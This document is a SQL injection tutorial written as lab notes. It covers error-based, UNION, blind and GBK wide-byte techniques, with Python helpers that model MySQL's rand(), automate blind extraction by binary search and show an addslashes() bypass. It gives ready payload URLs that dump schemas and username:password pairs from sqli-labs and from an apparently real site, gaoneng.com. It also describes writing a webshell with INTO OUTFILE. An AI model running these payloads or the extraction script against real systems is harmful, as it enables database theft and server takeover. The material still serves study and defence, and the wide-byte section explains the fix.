Web Security: SQL Injection
Principle

Condition: the user can reach, and modify, the content that is sent to the server.

Types, techniques and detection methods

Detection through the URL parameter:
  and 1=1 / and 1=2    judge from the returned page (integer type)
  '                    same as above, for the character (string) type
  -1 / +1              the adjacent record is displayed instead (integer type)
  and sleep(12)        judge from the response time
Everything below assumes ideal conditions (no filtering in the way).

Error-based: the floor() method

Building the query up step by step in the MySQL client:

mysql> select concat((select database()));
mysql> select concat((select database()),0x3a);
mysql> select concat((select database()),0x3a,floor(rand()*2));
mysql> select concat((select database()),0x3a,floor(rand()*2)) a;
mysql> select concat((select database()),0x3a,floor(rand()*2)) a from information_schema.tables;
mysql> select concat((select database()),0x3a,floor(rand()*2)) a from information_schema.tables group by a;
mysql> select count(*),concat((select database()),0x3a,floor(rand()*2)) a from information_schema.tables group by a;
ERROR 1062 (23000): Duplicate entry 'security:1' for key 'group_key'

With an unseeded rand() the collision is probabilistic, so the last statement may have to be re-run before it fails; rand(0) produces a fixed sequence and fails reliably as long as the table in the FROM clause has at least three rows, which is why the count-of-databases payload below uses it.
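Why the last statement ends in ERROR 1062, as an added Python example (not code from the original notes, and not MySQL's own source): the MySQLRand class re-implements the my_rnd() generator so that rand(0) yields the server's exact sequence, and group_by_count models the widely documented GROUP BY behaviour that the key expression is evaluated once to look the key up in the temporary table and a second time when a new key is inserted. The row counts, the leaked value 'security' (standing in for database() on sqli-labs) and all function names are the example's own.

```python
from math import floor

MAX_VALUE = 0x3FFFFFFF  # max_value in MySQL's rand_struct


class MySQLRand:
    """Re-implementation of MySQL's my_rnd() for a constant seed (rand(0) here)."""

    def __init__(self, seed=0):
        # Item_func_rand seeds with (seed*0x10001+55555555, seed*0x10000001).
        self.seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
        self.seed2 = (seed * 0x10000001) % MAX_VALUE

    def next(self):
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand_sequence(n, seed=0):
    """First n values of floor(rand(seed)*2), as the server would compute them."""
    rng = MySQLRand(seed)
    return [floor(rng.next() * 2) for _ in range(n)]


class DuplicateEntry(Exception):
    """Stands in for ERROR 1062 (23000): Duplicate entry ... for key 'group_key'."""


def group_by_count(row_count, key_expr):
    """Model of  SELECT count(*), <key_expr> a FROM t GROUP BY a  over row_count rows.

    key_expr() is called once per row to look the key up in the temporary
    table; if the key is missing it is called again to build the row that is
    inserted. For a deterministic expression both calls agree; for one built
    on rand() the second value can already be present, and the insert fails.
    """
    temp_table = {}
    for _ in range(row_count):
        key = key_expr()
        if key in temp_table:
            temp_table[key] += 1
            continue
        key = key_expr()  # second evaluation, used for the insert
        if key in temp_table:
            raise DuplicateEntry(f"Duplicate entry '{key}' for key 'group_key'")
        temp_table[key] = 1
    return temp_table


def run_floor_attack(row_count, leak="security", seed=0):
    """concat(<leak>,0x3a,floor(rand(seed)*2)) grouped over row_count rows.

    Returns the error text the attacker would read, or None when the query
    succeeds and nothing leaks. leak='security' mirrors database() on sqli-labs.
    """
    rng = MySQLRand(seed)
    try:
        group_by_count(row_count, lambda: f"{leak}:{floor(rng.next() * 2)}")
    except DuplicateEntry as err:
        return str(err)
    return None


if __name__ == "__main__":
    print(floor_rand_sequence(8))
    for rows in (1, 2, 3):
        print(rows, "rows ->", run_floor_attack(rows))
```

The sequence starts 0, 1, 1, 0, 1: row one looks up key 0, misses, and inserts key 1; row two looks up 1 and hits; row three looks up 0, misses, re-evaluates to 1 and tries to insert a key that already exists. That is why three rows are the minimum for a reliable rand(0) payload, and information_schema.tables always has far more.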
Whatever is placed inside the concat() (database name, user, version, host type, and so on) comes back inside the error message. Number of databases:
http://127.0.0.1/ctf/sqli-labs/Less-5/index.php?id=1'+and(select 1 from(select count(*),concat((select (select (select concat(0x7e7e3a7e7e, count(distinct+table_schema),0x7e7e3a7e7e) from information_schema.tables)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
Database:
http://127.0.0.1/ctf/sqli-labs/Less-5/index.php?id=-1' UNION SELECT 1,count(*),concat(0x3a,(select database()),0x3a,floor(rand()*2)) a from information_schema.tables group by a--+

Tables:
http://127.0.0.1/ctf/sqli-labs/Less-5/index.php?id=-1' UNION SELECT 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 1,1),0x3a,floor(rand()*2)) a from information_schema.tables group by a--+

Columns:
http://127.0.0.1/ctf/sqli-labs/Less-5/index.php?id=-1' UNION SELECT 1,count(*),concat((select column_name from information_schema.columns where table_name='users' limit 2,1),0x3a,floor(rand()*2)) a from information_schema.tables group by a--+

Data:
http://127.0.0.1/ctf/sqli-labs/Less-5/index.php?id=-1' UNION SELECT 1,count(*),concat((select concat_ws(0x3a,username,password) from users limit 1,1),0x3a,floor(rand()*2)) a from information_schema.tables group by a--+
Note: changing the limit offset returns a different user, table name, and so on.

On MySQL 5.x the result can also be written to a file with INTO OUTFILE, provided the current MySQL user has the FILE privilege (and, where secure_file_priv is set, the target directory is one it allows). Database:
http://127.0.0.1/ctf/sqli-labs/Less-7/index.php?id=1')) UNION SELECT 1,database(),3 into outfile "D:/Wamp/www/ctf/sqli-labs/Less-7/tests.txt" --+
This is also how a webshell is written to disk. INTO OUTFILE refuses to overwrite an existing file, so pick a new file name for each attempt and export everything the query needs in a single statement.
Blind injection

Suited to MySQL versions below 5.x and to pages where error output is suppressed. (The payloads below read information_schema, which only exists from MySQL 5.0 onward; on older servers table and column names have to be guessed outright.)

Determine the version:

Database:

http://127.0.0.1/ctf/sqli-labs/Less-8/index.php?id=1' and (select length(table_name)> from information_schema.tables where table_schema=database() limit 0,1) --+   # true
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php?id=1' and (select length(table_name)>7 from information_schema.tables where table_schema=database() limit 0,1) --+   # false
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php?id=1' and (select length(table_name)=6 from information_schema.tables where table_schema=database() limit 0,1) --+   # true: the first table name is 6 characters long
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php?id=1' and ascii((select table_name from information_schema.tables where table_schema=database() limit 0,1))=101 --+   # ascii('e')=101; ascii() of the whole name tests only its first character, use substr(..., n, 1) for the n-th
Step the limit offset to test the next table name the same way.
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php?id=1' and (select length(column_name)>4 from information_schema.columns where table_name limit 0,1) --+
Repeat the same steps to guess the columns.
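The length and character probes above are the manual form of an algorithm. As an added Python example (not code from the original notes), the following drives the same probes with binary search through a boolean oracle, so a name costs a handful of requests per character instead of one per candidate value. The oracle, the in-memory SQLite table standing in for information_schema.tables, its four constructed rows and all function names are the example's own; on MySQL the subquery would read information_schema.tables with table_schema=database(), and the character test would use ascii() where SQLite spells the same function unicode().

```python
import sqlite3

# Constructed stand-in for information_schema.tables; not a real target.
_db = sqlite3.connect(":memory:")
_db.executescript("""
CREATE TABLE tables(table_schema TEXT, table_name TEXT);
INSERT INTO tables VALUES ('security','emails'),('security','referers'),
                          ('security','uagents'),('security','users');
""")

REQUESTS = {"count": 0}  # how many oracle calls (HTTP requests) were needed


def oracle(condition):
    """Boolean oracle: True when the injected condition holds.

    On a real target this is one request of the form
        ?id=1' and (<condition>) --+
    and the check is whether the normal page comes back. Here the condition
    is evaluated directly against SQLite instead.
    """
    REQUESTS["count"] += 1
    (result,) = _db.execute(f"SELECT ({condition})").fetchone()
    return bool(result)  # NULL (no such row) counts as false, as in MySQL


def subquery(offset):
    """Scalar subquery for the offset-th table name (MySQL form in the lead-in)."""
    return ("(select table_name from tables where table_schema='security' "
            f"limit {offset},1)")


def find_length(subq, max_len=64):
    """Binary search length(subq); ends at the smallest n with length <= n."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length({subq})>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def find_char(subq, pos):
    """Binary search the code of character `pos` (1-based) over printable ASCII."""
    lo, hi = 32, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"unicode(substr({subq},{pos},1))>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_string(subq):
    """Length first, then every character; returns '' when the row is absent."""
    length = find_length(subq)
    return "".join(find_char(subq, i) for i in range(1, length + 1))


def enumerate_tables(max_tables=32):
    """Walk the limit offset until the subquery returns no row (length 0)."""
    names = []
    for offset in range(max_tables):
        name = extract_string(subquery(offset))
        if not name:
            break
        names.append(name)
    return names


if __name__ == "__main__":
    print(enumerate_tables(), "in", REQUESTS["count"], "requests")
```

The same two functions extract any scalar the oracle can see (version(), user(), a password hash) once the subquery is swapped; for a time-based oracle the only change is that oracle() measures response time after wrapping the condition in if(<condition>,sleep(N),0).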
Union-based (plain union select with group_concat; ",...,x" fills the remaining columns so the union matches the column count of the original query):

http://gaoneng.com/hz.php?id=37 and 1=2 union select 1,2,(select group_concat(schema_name) from information_schema.schemata),...,x   dump the databases
http://gaoneng.com/hz.php?id=37 and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='<database name>'),...,x   dump the tables
http://gaoneng.com/hz.php?id=37 and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='<table name>'),...,x   dump the columns
http://gaoneng.com/hz.php?id=37 and 1=2 union select 1,2,(select group_concat(user,0x3a,pass) from <table name>),...,x   dump the data
Wide-byte injection

Condition: the database connection uses GBK encoding.

The wide-byte injection most often seen in practice relies on GBK, and it exists to get past addslashes() and similar functions that escape special characters one byte at a time. The backslash \ is %5c. When you submit %bf%27, the escaping function sees the single quote and puts a \ in front of it, so the bytes become %bf%5c%27. In GBK, %bf%5c is read as the single two-byte character "縗": the backslash is swallowed into that character and the %27 quote that follows it is live again. The %bf position can be any lead byte from %81 to %fe. The defence is to escape with knowledge of the connection charset (mysql_set_charset('gbk') before mysql_real_escape_string(), which is charset-aware) or, better, to use parameterised queries; escaping bytes without knowing how the server will decode them is exactly what creates the hole.
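The byte sequence above, worked through as an added Python example (not code from the original notes, and not PHP's): addslashes() is a byte-level re-implementation of the PHP function, the users query template and the payloads are constructed, and hardened_query shows the charset-aware alternative of decoding the input as GBK before escaping, which is the principle behind mysql_set_charset() plus mysql_real_escape_string(). All function names are the example's own.

```python
PREFIX = "SELECT * FROM users WHERE id='"
SUFFIX = "' LIMIT 0,1"


def addslashes(raw: bytes) -> bytes:
    """PHP addslashes(): a backslash before ', ", \\ and NUL, byte by byte,
    with no knowledge of the character set the bytes belong to."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def vulnerable_query(raw: bytes) -> str:
    """Escape the raw bytes, then read the result as a GBK connection would."""
    sql = PREFIX.encode("gbk") + addslashes(raw) + SUFFIX.encode("gbk")
    return sql.decode("gbk")


def hardened_query(raw: bytes) -> str:
    """Decode with the connection charset first, then escape characters, not
    bytes. Invalid GBK such as \\xbf followed by a quote is rejected outright,
    because 0x27 is not a legal GBK trail byte."""
    text = raw.decode("gbk")  # strict: raises UnicodeDecodeError on %bf%27
    escaped = "".join(("\\" + c) if c in "'\"\\\x00" else c for c in text)
    return PREFIX + escaped + SUFFIX


def hardened_rejects(raw: bytes) -> bool:
    """True when hardened_query refuses the input as malformed GBK."""
    try:
        hardened_query(raw)
    except UnicodeDecodeError:
        return True
    return False


def literal_remainder(sql: str) -> str:
    """What follows the id='...' literal once the parser closes it."""
    i = len(PREFIX)  # first character inside the literal
    while i < len(sql):
        if sql[i] == "\\":
            i += 2  # escaped character, skip it
            continue
        if sql[i] == "'":
            return sql[i + 1:]
        i += 1
    return ""


def escapes_literal(sql: str) -> bool:
    """True when the user input terminated the literal early (injection)."""
    return literal_remainder(sql) != SUFFIX[1:]


def backslash_eating_lead_bytes():
    """Lead bytes in 0x81-0xFE for which <lead> 0x5C decodes as one GBK character."""
    found = []
    for lead in range(0x81, 0xFF):
        try:
            if len(bytes([lead, 0x5C]).decode("gbk")) == 1:
                found.append(lead)
        except UnicodeDecodeError:
            pass
    return found


if __name__ == "__main__":
    payload = b"\xbf' or 1=1 -- "  # %bf%27 followed by the injected clause
    print(vulnerable_query(payload))
    print("breaks out:", escapes_literal(vulnerable_query(payload)))
    print("hardened rejects it:", hardened_rejects(payload))
    print(len(backslash_eating_lead_bytes()), "lead bytes swallow the backslash")
```

backslash_eating_lead_bytes() checks the %81-%fe claim against Python's GBK codec; lead bytes in the user-defined areas may decode to private-use characters or fail depending on the codec in use, so confirm the range against the target's actual charset rather than assuming every value works.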